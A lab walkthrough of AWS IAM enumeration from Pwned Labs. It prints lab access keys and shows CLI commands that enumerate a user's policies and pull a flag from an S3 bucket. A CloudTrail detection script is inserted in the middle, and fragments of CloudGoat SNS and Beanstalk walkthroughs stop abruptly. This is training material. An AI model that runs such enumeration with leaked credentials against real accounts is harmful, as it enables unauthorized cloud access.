
Pwned Labs: Intro to AWS IAM Enumeration

Enumeration

Initial Access – AWS Credentials

Access key ID: AKIA3SFMDAPOWC2NR5LO
Secret access key : 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

Verify Access

└──╼ $aws sts get-caller-identity --profile iam_user 
{
    "UserId": "AIDA3SFMDAPOWFB7BSGME",
    "Account": "794929857501",
    "Arn": "arn:aws:iam::794929857501:user/dev01"
}

IAM Policy Enumeration

List Attached Managed Policies

└──╼ $aws iam list-attached-user-policies --user-name dev01 --profile iam_user 
{
    "AttachedPolicies": [
        {
            "PolicyName": "AmazonGuardDutyReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
        },
        {
            "PolicyName": "dev01",
            "PolicyArn": "arn:aws:iam::794929857501:policy/dev01"
        }
    ]
}
  • Attached Policies found:
    • AmazonGuardDutyReadOnlyAccess
    • dev01 (custom managed policy)

List Inline Policies

└──╼ $aws iam list-user-policies --user-name dev01 --profile iam_user 
{
    "PolicyNames": [
        "S3_Access"
    ]
}
  • Inline Policy Found: S3_Access

View Inline Policy: S3_Access

└──╼ $aws iam get-user-policy --policy-name S3_Access --user-name dev01 --profile iam_user 
{
    "UserName": "dev01",
    "PolicyName": "S3_Access",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "s3:ListBucket",
                    "s3:GetObject"
                ],
                "Resource": [
                    "arn:aws:s3:::hl-dev-artifacts",
                    "arn:aws:s3:::hl-dev-artifacts/*"
                ]
            }
        ]
    }
}
  • dev01 can list and read objects (s3:ListBucket, s3:GetObject) in the S3 bucket hl-dev-artifacts
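
Seen from the defender's side, the STS and IAM calls above are recorded by CloudTrail as management events. The sketch below is an added example, not part of the original walkthrough: it flags any access key that makes several distinct enumeration calls inside a short window. The sample records, placeholder key IDs, window and threshold are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# CloudTrail eventName values for the STS/IAM calls made in the walkthrough.
ENUM_EVENTS = {"GetCallerIdentity", "ListAttachedUserPolicies",
               "ListUserPolicies", "GetUserPolicy"}

def parse_time(ts):
    # CloudTrail eventTime is UTC, e.g. 2023-10-01T17:00:05Z
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")

def find_enumeration(records, window=timedelta(minutes=10), min_distinct=3):
    """Map access key ID -> sorted distinct enumeration calls, for every key
    that made at least min_distinct different calls inside one window."""
    by_key = defaultdict(list)
    for r in records:
        key = r.get("userIdentity", {}).get("accessKeyId")
        if key and r.get("eventName") in ENUM_EVENTS:
            by_key[key].append((parse_time(r["eventTime"]), r["eventName"]))
    hits = {}
    for key, events in by_key.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # Distinct call types in the window that opens at this event.
            seen = {name for t, name in events[i:] if t - start <= window}
            if len(seen) >= min_distinct:
                hits[key] = sorted(seen)
                break
    return hits

def _rec(time, source, name, key):
    # Only the CloudTrail record fields this check reads.
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "userIdentity": {"type": "IAMUser", "accessKeyId": key}}

# Constructed sample records; the key IDs are placeholders, not real keys.
ENUM, APP, SLOW = "AKIAEXAMPLEENUM00001", "AKIAEXAMPLEAPP000002", "AKIAEXAMPLESLOW00003"
SAMPLE = [
    _rec("2023-10-01T17:00:05Z", "sts.amazonaws.com", "GetCallerIdentity", ENUM),
    _rec("2023-10-01T17:00:40Z", "iam.amazonaws.com", "ListAttachedUserPolicies", ENUM),
    _rec("2023-10-01T17:01:10Z", "iam.amazonaws.com", "ListUserPolicies", ENUM),
    _rec("2023-10-01T17:01:30Z", "iam.amazonaws.com", "GetUserPolicy", ENUM),
    _rec("2023-10-01T17:00:00Z", "sts.amazonaws.com", "GetCallerIdentity", APP),  # identity check only
    _rec("2023-10-01T17:05:00Z", "sts.amazonaws.com", "GetCallerIdentity", APP),
    _rec("2023-10-01T09:00:00Z", "iam.amazonaws.com", "ListUserPolicies", SLOW),  # spread over hours
    _rec("2023-10-01T12:00:00Z", "iam.amazonaws.com", "GetUserPolicy", SLOW),
    _rec("2023-10-01T15:00:00Z", "iam.amazonaws.com", "ListAttachedUserPolicies", SLOW),
]

if __name__ == "__main__":
    for key, calls in find_enumeration(SAMPLE).items():
        print(f"ALERT {key}: {', '.join(calls)}")
```

The third key shows the trade-off in the window size: calls spaced hours apart stay under a 10-minute window, so the window and threshold need tuning against what legitimate tooling in the account does.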

S3 Bucket Enumeration

└──╼ $aws s3 ls s3://hl-dev-artifacts --profile iam_user
2023-10-01 16:39:53       1235 android-kotlin-extensions-tooling-232.9921.47.pom
2023-10-01 16:39:53     214036 android-project-system-gradle-models-232.9921.47-sources.jar
2023-10-01 16:38:05         32 flag.txt
  • The user can list several objects in the bucket, including flag.txt. Let's download the flag.

Retrieve the Flag

└──╼ $aws s3 cp s3://hl-dev-artifacts/flag.txt . --profile iam_user 
download: s3://hl-dev-artifacts/flag.txt to ./flag.txt           
└──╼ $cat flag.txt 
Redactedc904551935c7514
  • Flag: Redacted8545df0c904551935c7514

We're not done yet: time to dig into the managed policies and see what else we can uncover.

CloudGoat: SNS Secrets Walkthrough

Understanding AWS SNS (Simple Notification Service)

Amazon SNS is a fully managed messaging service that helps you send messages between applications or from applications to people. It supports two main types of messaging:

1. Application-to-Application (A2A) Notifications

This is useful when one app needs to talk to another. For example, if your website needs to send a message to a backend service when someone signs up, SNS can handle that. It helps connect and separate different parts of your app, so they work smoothly without being tightly linked.

CloudGoat: Beanstalk Secrets Walkthrough

AWS Elastic Beanstalk

Elastic Beanstalk is AWS's Platform-as-a-Service (PaaS) for web applications and services. You deploy code, and it handles the heavy lifting of capacity provisioning, load balancing, auto-scaling, application health monitoring and updates.

  • Automated Infrastructure
    • Provisions EC2 instances, Load Balancers, and Auto Scaling Groups
    • Manages capacity, deployments (rolling, immutable, blue/green), health checks, and scaling rules

How it works
You simply upload your application code (Node.js, Python, Java, .NET, etc.), choose an execution platform, and Elastic Beanstalk orchestrates the underlying AWS resources. This streamlines deployments, abstracts away infrastructure complexity, and lets you focus squarely on your application logic.